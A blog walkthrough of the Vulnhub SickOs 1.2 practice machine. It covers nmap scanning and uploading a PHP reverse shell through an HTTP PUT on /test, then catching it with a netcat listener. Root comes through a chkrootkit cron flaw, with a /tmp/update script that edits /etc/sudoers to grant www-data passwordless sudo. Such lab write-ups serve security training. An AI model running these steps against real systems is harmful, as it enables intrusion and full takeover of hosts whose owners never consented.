SickOs: 1.2 Vulnhub Machine Walkthrough

Today we are playing with SickOs 1.2 from Vulnhub.

Get the IP first.

nmap -sP

The IP address is

Lets do a detailed scan now

root@kali:~# nmap -A -O -sV -T5 -p- --script vuln
Starting Nmap 7.80 ( ) at 2020-08-11 04:22 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for
Host is up (0.0010s latency).
Not shown: 65533 filtered ports
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check: 
|   Slowloris DOS attack
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|     Disclosure date: 2009-09-17
|     References:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:lighttpd:lighttpd:1.4.28: 
|       CVE-2013-4559   7.6
|       CVE-2014-2323   7.5
|       CVE-2013-4508   5.8
|       CVE-2018-19052  5.0
|       CVE-2014-2324   5.0
|       CVE-2011-4362   5.0
|_      CVE-2013-4560   2.6
MAC Address: 08:00:27:65:6A:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.18, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   1.04 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 173.84 seconds

We have nothing interesting in index.php.

but there is a page /test

Lets use CURL and check allowed HTTP Options.

curl -v -X OPTIONS

Here PUT is allowed. Lets try uploading a php shell there.

Lets download this and PUT to the server.

tar -xzf php-reverse-shell-1.0.tar.gz

Edit the IP and PORT in the script.

Start a netcat listener in our machine

nc -nlvp 5555

and upload to server

curl --upload-file  shell.php -v --url -0 --http1.0

Now try to access this in the server.

WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110) 

Looks like a problem with firewall. Lets try on port 443. Edit the file and re-upload to target.

We gota connection from the server. Great.

Lets now try to escalate privileges.

First get a TTY shell with the following command

python -c 'import pty;pty.spawn("/bin/bash")'

Lets have a look at the cron jobs.

ls -l /etc/cron.daily

There is a cron job with chkrootkit. We have a vulnerability for chkrootkit here.

chkrootkit will run any executable placed as /tmp/update with root privileges.

Lets create the file.

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update

Here our cron job runs daily. So we need to wait till next time the job runs. Use this command to check if the file is updated.

ls -la /etc/sudoers

After a few minutes the /etc/sudoers file got updated.

Now check our privileges.

We are root now. Lets find the flag.

SickOS v2 conquered! Next day next machine!

Published by

Melbin Mathew

I'm Melbin Mathew from Kerala, India. Infosec enthusiast, interested in Bug Hunting, Web App Pentesting and and Blogging. Love learning something new every day. Drop a mail to connect. LinkedIn | Github | Twitter Contact: melbin [-at-]

Leave a Reply

Your email address will not be published. Required fields are marked *